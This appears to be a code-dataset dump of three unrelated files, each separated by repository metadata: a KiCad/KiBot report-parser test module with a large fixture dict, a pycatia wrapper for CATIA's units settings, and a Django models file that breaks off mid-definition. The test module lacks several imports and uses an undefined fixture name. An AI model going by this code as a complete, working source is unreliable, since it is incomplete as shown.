comnbined_result_test = {'kontur': {'summary': {'drc': 0, 'unconnected': 0, 'erc': 0, 'unit_test': {'passed': 7, 'num_tests': 8}}, 'main': {'bom': [{'ref': ['C1', 'C2'], 'value': '22u', 'datasheet': '~', 'description': 'Aluminium Electrolytic Capacitors (50V, D=6.3 mm, LS=2.5 mm)', 'footprint': 'Capacitor_THT:CP_Radial_D6.3mm_P2.50mm'}, {'ref': ['C3', 'C4', 'C5', 'C6', 'C8', 'C10', 'C11'], 'value': '0.1u', 'datasheet': '~', 'description': 'Multilayer Ceramic Capacitors MLCC (50V, L=4 mm, W=2.5 mm, LS=2.5 mm)', 'footprint': 'Capacitor_THT:C_Rect_L4.0mm_W2.5mm_P2.50mm'}, {'ref': ['C7', 'C9'], 'value': '2.2u', 'datasheet': '~', 'description': 'Multilayer Ceramic Capacitors MLCC (25V, L=6 mm, W=5.5 mm, LS=5 mm)', 'footprint': 'Capacitor_THT:C_Disc_D6.0mm_W4.4mm_P5.00mm'}, {'ref': ['D1', 'D4', 'D7', 'D8', 'D9', 'D10', 'D11', 'D12', 'D15', 'D18', 'D19', 'D20', 'D21', 'D22'], 'value': '1N4148', 'datasheet': 'https://assets.nexperia.com/documents/data-sheet/1N4148_1N4448.pdf', 'description': 'Diode_THT:D_DO-35_SOD27_P7.62mm_Horizontal', 'footprint': 'Diode_THT:D_DO-35_SOD27_P7.62mm_Horizontal'}, {'ref': ['D2', 'D3', 'D5', 'D6', 'D13', 'D14', 'D16', 'D17'], 'value': '1N4148', 'datasheet': 'https://assets.nexperia.com/documents/data-sheet/1N4148_1N4448.pdf', 'description': 'Diode_THT:D_DO-35_SOD27_P2.54mm_Vertical_KathodeUp', 'footprint': 'Diode_THT:D_DO-35_SOD27_P2.54mm_Vertical_KathodeUp'}, {'ref': ['J1'], 'value': '01x09 Female', 'datasheet': '~', 'description': 'Board to Board Connectors (2.54 mm)', 'footprint': 'Connector_PinSocket_2.54mm:PinSocket_1x09_P2.54mm_Vertical'}, {'ref': ['J2'], 'value': '10 Pos', 'datasheet': '~', 'description': 'Pin Header IDC (2.54mm)', 'footprint': 'Connector_IDC:IDC-Header_2x05_P2.54mm_Vertical'}, {'ref': ['J3'], 'value': '01x07 Female', 'datasheet': '~', 'description': 'Board to Board Connectors (2.54 mm)', 'footprint': 'Connector_PinSocket_2.54mm:PinSocket_1x07_P2.54mm_Vertical'}, {'ref': ['R1', 'R16', 'R19', 'R32'], 'value': '100k', 
'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R2', 'R20'], 'value': '27k', 'datasheet': '~', 'description': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R3', 'R21'], 'value': '390k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R4', 'R9', 'R22', 'R25'], 'value': '47k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R5', 'R6'], 'value': '10', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R7', 'R23'], 'value': '470k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R8', 'R24'], 'value': '2.2k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R10', 'R26'], 'value': '10k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R11', 'R27'], 'value': '36k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R12', 'R14', 'R15', 'R17', 'R18', 'R28'], 'value': '1k', 'datasheet': '~', 
'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R13', 'R29'], 'value': '220', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['U1', 'U2', 'U4'], 'value': 'LM324', 'datasheet': 'http://www.ti.com/lit/ds/symlink/lm2902-n.pdf', 'description': 'Package_DIP:DIP-14_W7.62mm_Socket', 'footprint': 'Package_DIP:DIP-14_W7.62mm_Socket'}, {'ref': ['U3'], 'value': '4001', 'datasheet': 'http://www.intersil.com/content/dam/Intersil/documents/cd40/cd4000bms-01bms-02bms-25bms.pdf', 'description': 'Package_DIP:DIP-14_W7.62mm_Socket', 'footprint': 'Package_DIP:DIP-14_W7.62mm_Socket'}], 'drc': [], 'unconnected': [], 'erc': []}, 'unit_test': {'report': {'environment': {'Python': '3.9.2', 'Platform': 'Linux-5.14.7-2-MANJARO-x86_64-with-glibc2.31'}, 'tests': [{'name': 'test/test_produkt.py::test_buffer_1a_voltage', 'duration': 0.22563197650015354, 'run_index': 0, 'setup': {'name': 'setup', 'duration': 0.0064605968073010445, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.21237082267180085, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.0003399602137506008, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_buffer_1b_voltage', 'duration': 0.06783118983730674, 'run_index': 1, 'setup': {'name': 'setup', 'duration': 0.0005186581984162331, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.06649156985804439, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.00030230358242988586, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_buffer_2a_voltage', 'duration': 0.06628352915868163, 'run_index': 2, 'setup': {'name': 'setup', 'duration': 0.00036448799073696136, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 
0.06524515384808183, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.0003093993291258812, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_buffer_2b_voltage', 'duration': 0.06417899625375867, 'run_index': 3, 'setup': {'name': 'setup', 'duration': 0.0003621121868491173, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.06313963187858462, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.000315140001475811, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_output_amplifier_1_voltage', 'duration': 0.06402606330811977, 'run_index': 4, 'setup': {'name': 'setup', 'duration': 0.00033985963091254234, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.06304994691163301, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.0002963971346616745, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_output_amplifier_2_voltage', 'duration': 0.06275479821488261, 'run_index': 5, 'setup': {'name': 'setup', 'duration': 0.0004264460876584053, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.06150294793769717, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.00039895810186862946, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_trimpot_1_voltage', 'duration': 0.06260482640936971, 'run_index': 6, 'setup': {'name': 'setup', 'duration': 0.0004696645773947239, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.06136759603396058, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.0002979012206196785, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_trimpot_2_voltage', 'duration': 0.06243716413155198, 'run_index': 7, 'setup': {'name': 'setup', 'duration': 0.00034465081989765167, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.061167610343545675, 'outcome': 'failed', 'longrepr': 'def 
test_trimpot_2_voltage():\n simulator = load().simulator(temperature=25, nominal_temperature=25)\n analysis_op = simulator.operating_point()\n result = float(analysis_op["Net-_R8-Pad2_"])\n> assert result == approx( -2.9941339771434902e-05, rel=1e-1 )\nE assert -2.1085450543264016e-06 == -2.9941339771434902e-05 ± 3.0e-06\nE + where -2.9941339771434902e-05 ± 3.0e-06 = approx(-2.9941339771434902e-05, rel=0.1)\n\ntest/test_produkt.py:112: AssertionError'}, 'teardown': {'name': 'teardown', 'duration': 0.0005802521482110023, 'outcome': 'passed'}, 'outcome': 'failed'}], 'summary': {'passed': 7, 'failed': 1, 'num_tests': 8, 'duration': 1.4830241203308105}, 'created_at': '2021-11-14 13:49:53.775865'}}}}
import kicad
from kicad import parse_kibot
from kicad import report2xunit
class TestScanner(unittest.TestCase):
    """kicad.kicad_scan discovers the pcb/schematic files of a project."""

    def _scan(self, project_path):
        """Scan *project_path* through the default SCons filesystem node."""
        node = SCons.Node.FS.get_default_fs().File(project_path)
        return kicad.kicad_scan(node, '', '')

    def test_scanner(self):
        """A flat project yields its board file and top-level schematic."""
        expected = [
            '/github/workspace/example/kontur/main/main.kicad_pcb',
            '/github/workspace/example/kontur/main/main.sch',
        ]
        self.assertEqual(self._scan('example/kontur/main/main.pro'), expected)

    def test_scanner_subschema(self):
        """A hierarchical project additionally yields every sub-sheet."""
        expected = [
            '/github/workspace/example/vca/main/main.kicad_pcb',
            '/github/workspace/example/vca/main/main.sch',
            '/github/workspace/example/vca/main/VCA1.sch',
            '/github/workspace/example/vca/main/VCA2.sch',
            '/github/workspace/example/vca/main/VCA3.sch',
            '/github/workspace/example/vca/main/VCA4.sch',
        ]
        self.assertEqual(self._scan('example/vca/main/main.pro'), expected)
class TestParseFiles(unittest.TestCase):
    """Path-derivation helpers map a .pro file to its sibling artifacts."""

    def test_schema(self):
        """First derived file is the schematic next to the project file."""
        derived = kicad.get_kicad_files('/foo/bar.pro')
        self.assertEqual(derived[0], '/foo/bar.sch')

    def test_pcb(self):
        """Second derived file is the board layout next to the project file."""
        derived = kicad.get_kicad_files('/foo/bar.pro')
        self.assertEqual(derived[1], '/foo/bar.kicad_pcb')

    def test_name(self):
        """Project name is the file stem without directory or extension."""
        self.assertEqual(kicad.get_kicad_name('/foo/bar.pro'), 'bar')
class TestParseKibot(unittest.TestCase):
    """kibot_parser turns recorded ERC/DRC text reports into issue dicts."""

    # Message kibot attaches to every "pin not connected" ERC finding.
    _PIN_NC = 'Pin not connected (use a "no connection" flag to suppress this error)'

    @staticmethod
    def _issue(message, points):
        """Build one expected issue entry from (x, y, text) tuples."""
        return {
            'code': '2',
            'sheet': '/',
            'message': message,
            'con': [{'x': x, 'y': y, 'message': text} for x, y, text in points],
        }

    def _parse(self, report_file):
        """Run the parser on *report_file* and return the filled response."""
        response = {}
        parse_kibot.kibot_parser(report_file, response)
        return response

    def test_erc_ok(self):
        """A clean ERC report produces an empty issue list."""
        self.assertEqual(self._parse('test/files/main-erc-ok.txt'), {'erc': []})

    def test_erc_error(self):
        """Each unconnected pin becomes one single-point ERC issue."""
        pins = [
            ('227.33', '78.74', 'Pin 5 (Input) of component U5 is unconnected.'),
            ('214.63', '123.19', 'Pin 3 (Input) of component U5 is unconnected.'),
            ('214.63', '118.11', 'Pin 2 (Input) of component U5 is unconnected.'),
            ('229.87', '120.65', 'Pin 1 (Output) of component U5 is unconnected.'),
            ('233.68', '100.33', 'Pin 7 (Output) of component U6 is unconnected.'),
            ('248.92', '102.87', 'Pin 6 (Input) of component U6 is unconnected.'),
            ('248.92', '97.79', 'Pin 5 (Input) of component U6 is unconnected.'),
            ('242.57', '76.20', 'Pin 7 (Output) of component U5 is unconnected.'),
            ('227.33', '73.66', 'Pin 6 (Input) of component U5 is unconnected.'),
            ('205.74', '76.20', 'Pin 7 (Output) of component U4 is unconnected.'),
            ('190.50', '73.66', 'Pin 6 (Input) of component U4 is unconnected.'),
            ('190.50', '78.74', 'Pin 5 (Input) of component U4 is unconnected.'),
            ('33.02', '29.21', 'Pin TN (Passive) of component J2 is unconnected.'),
            ('33.02', '24.13', 'Pin S (Passive) of component J2 is unconnected.'),
        ]
        expected = {'erc': [self._issue(self._PIN_NC, [pin]) for pin in pins]}
        self.assertEqual(self._parse('test/files/main-erc-error.txt'), expected)

    def test_drc_ok(self):
        """A clean DRC report produces empty drc and unconnected lists."""
        self.assertEqual(self._parse('test/files/main-drc-ok.txt'),
                         {'drc': [], 'unconnected': []})

    def test_drc_unconnected(self):
        """Each unconnected ratsnest entry becomes a two-point DRC issue."""
        pairs = [
            (('61.722', '94.148', 'Pad 6 of J1 on All copper layers'),
             ('59.182', '94.148', 'Pad 5 of J1 on All copper layers')),
            (('59.182', '96.688', 'Pad 7 of J1 on All copper layers'),
             ('59.182', '94.148', 'Pad 5 of J1 on All copper layers')),
            (('61.722', '96.688', 'Pad 8 of J1 on All copper layers'),
             ('59.182', '96.688', 'Pad 7 of J1 on All copper layers')),
            (('61.722', '96.688', 'Pad 8 of J1 on All copper layers'),
             ('68.732', '98.518', 'Pad 1 of C2 on All copper layers')),
            (('84.542', '86.868', 'Pad 2 of C1 on All copper layers'),
             ('68.732', '98.518', 'Pad 1 of C2 on All copper layers')),
            (('82.042', '86.868', 'Pad 1 of C1 on All copper layers'),
             ('67.497', '84.968', 'Pad 1 of R1 on All copper layers')),
            (('71.232', '98.518', 'Pad 2 of C2 on All copper layers'),
             ('67.497', '89.018', 'Pad 1 of R2 on All copper layers')),
            (('59.182', '99.228', 'Pad 9 of J1 on All copper layers'),
             ('61.722', '99.228', 'Pad 10 of J1 on All copper layers')),
            (('61.722', '91.608', 'Pad 4 of J1 on All copper layers'),
             ('59.182', '91.608', 'Pad 3 of J1 on All copper layers')),
            (('77.657', '84.968', 'Pad 2 of R1 on All copper layers'),
             ('61.722', '91.608', 'Pad 4 of J1 on All copper layers')),
            (('61.722', '89.068', 'Pad 2 of J1 on All copper layers'),
             ('59.182', '89.068', 'Pad 1 of J1 on All copper layers')),
            (('77.657', '89.018', 'Pad 2 of R2 on All copper layers'),
             ('61.722', '89.068', 'Pad 2 of J1 on All copper layers')),
        ]
        expected = {
            'drc': [],
            'unconnected': [self._issue('Unconnected items', list(pair))
                            for pair in pairs],
        }
        self.assertEqual(self._parse('test/files/main-drc-unconnected.txt'), expected)
class TestCombineResults(unittest.TestCase):
    """combine_reports merges a BOM export with a board report."""

    def test_combined_reports(self):
        sources = [
            'test/files/kontur_main_bom.json',
            'test/files/kontur_main_report.json',
        ]
        # ``comnbined_result`` (sic) is the module-level fixture dict.
        self.assertEqual(parse_kibot.combine_reports(sources), comnbined_result)
class TestCombineResultsWithTests(unittest.TestCase):
    """combine_reports also folds in pytest result JSON when supplied."""

    def test_combined_reports(self):
        sources = [
            'test/files/kontur_main_bom.json',
            'test/files/kontur_main_report.json',
            'test/files/produkt_test.json',
        ]
        # ``comnbined_result_test`` (sic) is the module-level fixture dict.
        self.assertEqual(parse_kibot.combine_reports(sources), comnbined_result_test)
class TestReportXunit(unittest.TestCase):
    """report2xunit.convert writes a parseable xunit XML file."""

    def test_xunit_reports(self):
        report2xunit.convert('test/files/report.json', 'test/files/report.xml')
        # Bug fix: the original asserted the *bound method* ``Path.exists``,
        # which is always truthy — it must be called to test the file.
        self.assertTrue(Path('test/files/report.xml').exists())
        # The output must be well-formed XML with a document root
        # (the parsed root was previously computed but never checked).
        tree = ET.parse('test/files/report.xml')
        self.assertIsNotNone(tree.getroot())
| 212.396396
| 8,726
| 0.651468
| 3,376
| 23,576
| 4.42654
| 0.165581
| 0.008431
| 0.017398
| 0.029577
| 0.789615
| 0.757562
| 0.7322
| 0.682883
| 0.671373
| 0.641194
| 0
| 0.109963
| 0.117068
| 23,576
| 110
| 8,727
| 214.327273
| 0.60785
| 0.044155
| 0
| 0.212121
| 0
| 0.409091
| 0.631651
| 0.184952
| 0
| 0
| 0
| 0
| 0.19697
| 1
| 0.181818
| false
| 0.030303
| 0.151515
| 0
| 0.424242
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cabc05d6df53c428b514fd2e408fe75773bd3d3c
| 32,532
|
py
|
Python
|
pycatia/knowledge_interfaces/units_sheet_setting_att.py
|
evereux/catia_python
|
08948585899b12587b0415ce3c9191a408b34897
|
[
"MIT"
] | 90
|
2019-02-21T10:05:28.000Z
|
2022-03-19T01:53:41.000Z
|
pycatia/knowledge_interfaces/units_sheet_setting_att.py
|
Luanee/pycatia
|
ea5eef8178f73de12404561c00baf7a7ca30da59
|
[
"MIT"
] | 99
|
2019-05-21T08:29:12.000Z
|
2022-03-25T09:55:15.000Z
|
pycatia/knowledge_interfaces/units_sheet_setting_att.py
|
Luanee/pycatia
|
ea5eef8178f73de12404561c00baf7a7ca30da59
|
[
"MIT"
] | 26
|
2019-04-04T06:31:36.000Z
|
2022-03-30T07:24:47.000Z
|
#!/usr/bin/python3.6
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-06-11 12:40:47.360445
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from pycatia.system_interfaces.setting_controller import SettingController
class UnitsSheetSettingAtt(SettingController):
    """Controller for the CATIA ``Tools > Options`` *Units* settings sheet.

    Thin wrapper over the ``CATIAUnitsSheetSettingAtt`` COM interface:
    every property and method below delegates directly to the underlying
    COM object.  Per the native documentation, writing administered
    parameters in plain user (non-administrator) mode fails with
    ``E_FAIL``.

    COM inheritance chain::

        System.IUnknown
          System.IDispatch
            System.CATBaseUnknown
              System.CATBaseDispatch
                System.AnyObject
                  System.SettingController
                    UnitsSheetSettingAtt
    """

    def __init__(self, com_object):
        super().__init__(com_object)
        # Keep a dedicated handle on the COM object; all members delegate
        # to it by its native (PascalCase) attribute names.
        self.units_sheet_setting_att = com_object

    @property
    def display_trailing_zeros(self) -> int:
        """DisplayTrailingZeros parameter.

        :return: 0 to hide trailing zeros, 1 to show them.
        :rtype: int
        """
        return self.units_sheet_setting_att.DisplayTrailingZeros

    @display_trailing_zeros.setter
    def display_trailing_zeros(self, value: int):
        """Set the DisplayTrailingZeros parameter (0 or 1).

        :param int value:
        """
        self.units_sheet_setting_att.DisplayTrailingZeros = value

    @property
    def exp_notation_values_greater(self) -> float:
        """Minimum value above which exponential notation is used.

        :rtype: float
        """
        return self.units_sheet_setting_att.ExpNotationValuesGreater

    @exp_notation_values_greater.setter
    def exp_notation_values_greater(self, value: float):
        """Set the ExpNotationValuesGreater parameter.

        :param float value:
        """
        self.units_sheet_setting_att.ExpNotationValuesGreater = value

    @property
    def exp_notation_values_lower(self) -> float:
        """Maximum value below which exponential notation is used.

        :rtype: float
        """
        return self.units_sheet_setting_att.ExpNotationValuesLower

    @exp_notation_values_lower.setter
    def exp_notation_values_lower(self, value: float):
        """Set the ExpNotationValuesLower parameter.

        :param float value:
        """
        self.units_sheet_setting_att.ExpNotationValuesLower = value

    @property
    def list_of_magnitudes(self) -> tuple:
        """Read-only ListOfMagnitudes parameter (CATSafeArrayVariant).

        :rtype: tuple
        """
        return self.units_sheet_setting_att.ListOfMagnitudes

    @property
    def list_of_magnitudes_size(self) -> float:
        """Read-only number of entries in :attr:`list_of_magnitudes`.

        :rtype: float
        """
        return self.units_sheet_setting_att.ListOfMagnitudesSize

    @property
    def same_display(self) -> int:
        """SameDisplay parameter.

        :return: 0 for same-display off, 1 for on.
        :rtype: int
        """
        return self.units_sheet_setting_att.SameDisplay

    @same_display.setter
    def same_display(self, value: int):
        """Set the SameDisplay parameter (0 or 1).

        :param int value:
        """
        self.units_sheet_setting_att.SameDisplay = value

    def commit_for_units(self) -> None:
        """Delegate to ``CommitForUnits`` on the COM interface.

        :rtype: None
        """
        return self.units_sheet_setting_att.CommitForUnits()

    def get_decimal_read_only(self, i_magnitude_name: str, o_decimal_place_read_only: float) -> None:
        """Query the number of decimals used for read-only values.

        Delegates to ``GetDecimalReadOnly``; the second argument is the
        output slot of the native signature.

        :param str i_magnitude_name:
        :param float o_decimal_place_read_only:
        :rtype: None
        """
        return self.units_sheet_setting_att.GetDecimalReadOnly(i_magnitude_name, o_decimal_place_read_only)

    def get_decimal_read_write(self, i_magnitude_name: str, o_decimal_place_read_write: float) -> None:
        """Query the number of decimals used for read/write values.

        Delegates to ``GetDecimalReadWrite``; the second argument is the
        output slot of the native signature.

        :param str i_magnitude_name:
        :param float o_decimal_place_read_write:
        :rtype: None
        """
        return self.units_sheet_setting_att.GetDecimalReadWrite(i_magnitude_name, o_decimal_place_read_write)

    def get_dimensions_display_info(self, io_admin_level: str, io_locked: str) -> bool:
        """Retrieve administration info for the DimensionsDisplay parameter.

        :param str io_admin_level: administration level governing the value.
        :param str io_locked: whether the parameter is locked.
        :return: whether the parameter was explicitly modified.
        :rtype: bool
        """
        return self.units_sheet_setting_att.GetDimensionsDisplayInfo(io_admin_level, io_locked)

    def get_display_trailing_zeros_info(self, io_admin_level: str, io_locked: str) -> bool:
        """Retrieve administration info for the DisplayTrailingZeros parameter.

        :param str io_admin_level: administration level governing the value.
        :param str io_locked: whether the parameter is locked.
        :return: whether the parameter was explicitly modified.
        :rtype: bool
        """
        return self.units_sheet_setting_att.GetDisplayTrailingZerosInfo(io_admin_level, io_locked)

    def get_exp_notation_values_greater_info(self, io_admin_level: str, io_locked: str) -> bool:
        """Retrieve administration info for the ExpNotationValuesGreater parameter.

        :param str io_admin_level: administration level governing the value.
        :param str io_locked: whether the parameter is locked.
        :return: whether the parameter was explicitly modified.
        :rtype: bool
        """
        return self.units_sheet_setting_att.GetExpNotationValuesGreaterInfo(io_admin_level, io_locked)

    def get_exp_notation_values_lower_info(self, io_admin_level: str, io_locked: str) -> bool:
        """Retrieve administration info for the ExpNotationValuesLower parameter.

        :param str io_admin_level: administration level governing the value.
        :param str io_locked: whether the parameter is locked.
        :return: whether the parameter was explicitly modified.
        :rtype: bool
        """
        return self.units_sheet_setting_att.GetExpNotationValuesLowerInfo(io_admin_level, io_locked)

    def get_list_of_magnitudes_info(self, io_admin_level: str, io_locked: str) -> bool:
        """Retrieve administration info for the ListOfMagnitudes parameter.

        :param str io_admin_level: administration level governing the value.
        :param str io_locked: whether the parameter is locked.
        :return: whether the parameter was explicitly modified.
        :rtype: bool
        """
        return self.units_sheet_setting_att.GetListOfMagnitudesInfo(io_admin_level, io_locked)

    def get_magnitude_values(self,
                             i_magnitude_name: str,
                             o_unit_name: str,
                             o_decimal_place_read_write: float,
                             o_decimal_place_read_only: float) -> None:
        """Query the unit and decimal settings of one magnitude.

        Delegates to ``GetMagnitudeValues``; the last three arguments are
        output slots of the native signature.

        :param str i_magnitude_name:
        :param str o_unit_name:
        :param float o_decimal_place_read_write:
        :param float o_decimal_place_read_only:
        :rtype: None
        """
        return self.units_sheet_setting_att.GetMagnitudeValues(i_magnitude_name, o_unit_name,
                                                               o_decimal_place_read_write, o_decimal_place_read_only)

    def get_same_display_info(self, io_admin_level: str, io_locked: str) -> bool:
        """Retrieve administration info for the SameDisplay parameter.

        :param str io_admin_level: administration level governing the value.
        :param str io_locked: whether the parameter is locked.
        :return: whether the parameter was explicitly modified.
        :rtype: bool
        """
        return self.units_sheet_setting_att.GetSameDisplayInfo(io_admin_level, io_locked)

    def reset_to_admin_values_for_units(self) -> None:
        """Delegate to ``ResetToAdminValuesForUnits`` on the COM interface.

        :rtype: None
        """
        return self.units_sheet_setting_att.ResetToAdminValuesForUnits()

    def rollback_for_units(self) -> None:
        """Delegate to ``RollbackForUnits`` on the COM interface.

        :rtype: None
        """
        return self.units_sheet_setting_att.RollbackForUnits()

    def save_repository_for_units(self) -> None:
        """Delegate to ``SaveRepositoryForUnits`` on the COM interface.

        :rtype: None
        """
        return self.units_sheet_setting_att.SaveRepositoryForUnits()

    # NOTE: for every Set*Lock call below, the autogenerated template warned
    # that some COM methods expect a VB array argument; if that turns out to
    # be the case, route the call through ``self.application.system_service
    # .evaluate()`` with a small VBA wrapper instead of calling it directly.

    def set_dimensions_display_lock(self, i_locked: bool) -> None:
        """Lock or unlock the DimensionsDisplay setting parameter.

        :param bool i_locked: True to lock, False to unlock.
        :rtype: None
        """
        return self.units_sheet_setting_att.SetDimensionsDisplayLock(i_locked)

    def set_display_trailing_zeros_lock(self, i_locked: bool) -> None:
        """Lock or unlock the DisplayTrailingZeros parameter.

        Deprecated since V5R15 — use :meth:`set_dimensions_display_lock`.

        :param bool i_locked: True to lock, False to unlock.
        :rtype: None
        """
        return self.units_sheet_setting_att.SetDisplayTrailingZerosLock(i_locked)

    def set_exp_notation_values_greater_lock(self, i_locked: bool) -> None:
        """Lock or unlock the ExpNotationValuesGreater parameter.

        Deprecated since V5R15 — use :meth:`set_same_display_lock`.

        :param bool i_locked: True to lock, False to unlock.
        :rtype: None
        """
        return self.units_sheet_setting_att.SetExpNotationValuesGreaterLock(i_locked)

    def set_exp_notation_values_lower_lock(self, i_locked: bool) -> None:
        """Lock or unlock the ExpNotationValuesLower parameter.

        Deprecated since V5R15 — use :meth:`set_dimensions_display_lock`.

        :param bool i_locked: True to lock, False to unlock.
        :rtype: None
        """
        return self.units_sheet_setting_att.SetExpNotationValuesLowerLock(i_locked)

    def set_list_of_magnitudes_lock(self, i_locked: bool) -> None:
        """Lock or unlock the ListOfMagnitudes setting parameter.

        :param bool i_locked: True to lock, False to unlock.
        :rtype: None
        """
        return self.units_sheet_setting_att.SetListOfMagnitudesLock(i_locked)

    def set_magnitude_values(self,
                             i_magnitude_name: str,
                             i_unit_name: str,
                             i_decimal_place_read_write: float,
                             i_decimal_place_read_only: float) -> None:
        """Set the unit and decimal settings of one magnitude.

        Delegates to ``SetMagnitudeValues``.

        :param str i_magnitude_name:
        :param str i_unit_name:
        :param float i_decimal_place_read_write:
        :param float i_decimal_place_read_only:
        :rtype: None
        """
        return self.units_sheet_setting_att.SetMagnitudeValues(i_magnitude_name, i_unit_name,
                                                               i_decimal_place_read_write, i_decimal_place_read_only)

    def set_same_display_lock(self, i_locked: bool) -> None:
        """Lock or unlock the SameDisplay parameter.

        Deprecated since V5R15 — use :meth:`set_dimensions_display_lock`.

        :param bool i_locked: True to lock, False to unlock.
        :rtype: None
        """
        return self.units_sheet_setting_att.SetSameDisplayLock(i_locked)

    def __repr__(self):
        return f'UnitsSheetSettingAtt(name="{self.name}")'
| 40.312268
| 117
| 0.546539
| 3,174
| 32,532
| 5.42281
| 0.092628
| 0.025564
| 0.04247
| 0.049965
| 0.827911
| 0.785847
| 0.719556
| 0.691727
| 0.687079
| 0.664246
| 0
| 0.031397
| 0.39103
| 32,532
| 806
| 118
| 40.362283
| 0.837414
| 0.663378
| 0
| 0.091954
| 1
| 0
| 0.006045
| 0.006045
| 0
| 0
| 0
| 0
| 0
| 1
| 0.367816
| false
| 0
| 0.011494
| 0.011494
| 0.701149
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
cad66b7f60c093d0c7362487434ec3f4023aa4b2
| 1,794
|
py
|
Python
|
Resume/models.py
|
SukhadaM/HackBit-Interview-Preparation-Portal
|
f4c6b0d7168a4ea4ffcf1569183b1614752d9946
|
[
"MIT"
] | null | null | null |
Resume/models.py
|
SukhadaM/HackBit-Interview-Preparation-Portal
|
f4c6b0d7168a4ea4ffcf1569183b1614752d9946
|
[
"MIT"
] | null | null | null |
Resume/models.py
|
SukhadaM/HackBit-Interview-Preparation-Portal
|
f4c6b0d7168a4ea4ffcf1569183b1614752d9946
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.core.validators import MinValueValidator, MaxValueValidator
# Create your models here.
class AbstractResumeTemplate(models.Model):
    """Abstract base holding the fields shared by every template catalogue model.

    The three concrete models below previously repeated these field
    definitions verbatim; factoring them into an abstract base keeps the
    per-model database schema identical (Django copies abstract fields into
    each concrete table) while removing the triplication.
    """
    template_type = models.CharField(max_length=200, db_index=True)
    template_name = models.CharField(unique=True, max_length=200, db_index=True)
